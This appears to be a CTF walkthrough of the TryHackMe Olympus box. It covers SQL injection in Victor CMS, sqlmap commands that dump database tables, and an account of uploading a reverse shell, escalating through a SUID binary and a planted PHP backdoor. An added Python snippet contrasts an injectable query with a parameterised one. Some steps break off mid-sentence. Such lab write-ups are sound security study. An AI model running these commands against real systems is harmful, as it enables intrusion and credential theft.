This walkthrough covers the Olympus CTF found on TryHackMe. The goal of this challenge is to exploit an SQLi vulnerability in a CMS, use sqlmap to acquire user credentials by extracting a database, identify a subdomain hosting a chat application, upload a reverse shell to establish a foothold on the system and take advantage of a poorly managed SUID binary to escalate privileges.
Step 1: What's Out There?
nmap -sS -sV -sC -p 22,80 olympus.thm --min-rate=1000
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://olympus.thm/FUZZ -fc 403
We discovered a directory named ~webmaster, which is where the CMS is located.
Step 3: SQLi
Testing the Victor CMS search field feature reveals an SQLi:
'SELECT * FROM users WHERE username='' and password='' OR 1=1;
Let's capture this with Burp Suite and plug it into sqlmap to automate our injection attack.
Copy this over to a text editor and run it through
We discovered a flag table in the olympus database, let's dump it.
Let's obtain our first flag.
sqlmap -r req.txt --batch --dump -T flag -D olympus
Now let's see what the users table can offer us.
Juicy credentials. We can crack the password hash for prometheus and use it to log in to the chat application.
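An added example, not part of the original writeup, that reproduces the precedence behaviour behind the rendered query above in SQLite and places a parameterised query beside it; the users table and hash values are constructed:

```python
"""Why `username='' and password='' OR 1=1` returns every row.

AND binds tighter than OR, so the WHERE clause parses as
(username='' AND password='') OR 1=1, which is true for each row.
The hardened version binds the same input as a parameter, so the
quote and the OR stay inside a string literal and never reach the parser.
"""
import sqlite3

# Constructed sample rows, not the real olympus database.
SAMPLE_USERS = [
    ("root", "hash_r"),
    ("zeus", "hash_z"),
    ("prometheus", "hash_p"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> list:
    # Untrusted input concatenated straight into the statement: the injection point.
    sql = f"SELECT username FROM users WHERE username='{username}' and password='{password}'"
    return [row[0] for row in con.execute(sql)]


def login_hardened(con: sqlite3.Connection, username: str, password: str) -> list:
    # Placeholders: the driver passes the values separately from the SQL text.
    sql = "SELECT username FROM users WHERE username=? and password=?"
    return [row[0] for row in con.execute(sql, (username, password))]


# The OR 1=1 tail seen in the page's rendered query; `--` comments out the closing quote.
PAYLOAD = "' OR 1=1 --"


def demo() -> dict:
    con = make_db()
    return {
        "vulnerable": login_vulnerable(con, "", PAYLOAD),  # every user comes back
        "hardened": login_hardened(con, "", PAYLOAD),      # no match
        "legit": login_hardened(con, "zeus", "hash_z"),    # normal login still works
    }
```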
Step 4: Enumerate Subdomain
We discovered three users: root, zeus, and prometheus. Additionally, we discovered a subdomain called chat that can be added to our
Let's enumerate the newly discovered subdomain.
I'm sure the uploads directory will play an important role later, in the meantime let's see if we can log in with these credentials.
And we're in. There looks to be an upload feature, let's see if we can upload a reverse shell.
It looks to have been uploaded somewhere, but we're not sure where. Let's go back to sqlmap and dump the chats table to see if the file name was changed upon uploading.
sqlmap -r req.txt --batch --dump -T chats -D olympus
Looks like it did. Let's copy this and see if we can reach it via the /uploads/ directory we found earlier.
Going to the path drops us into a shell. Searching for SUID binaries reveals
We can copy over zeus' id_rsa key and then ssh in with it.
Crack it using
Step 5: Privesc and Root
After looking around the file system for a while we discovered this:
Inside the PHP file seems to be a backdoor.
uname -a; w; /lib/defended/libc.so.99 drops us into a root shell.
This box was very difficult for me. I don't consider myself to be that knowledgeable on SQLi attacks, so I had to resort to a lot of googling to help me through. I will definitely give this box several more runs as I need to sharpen my command injection skills. As always, Happy Hacking!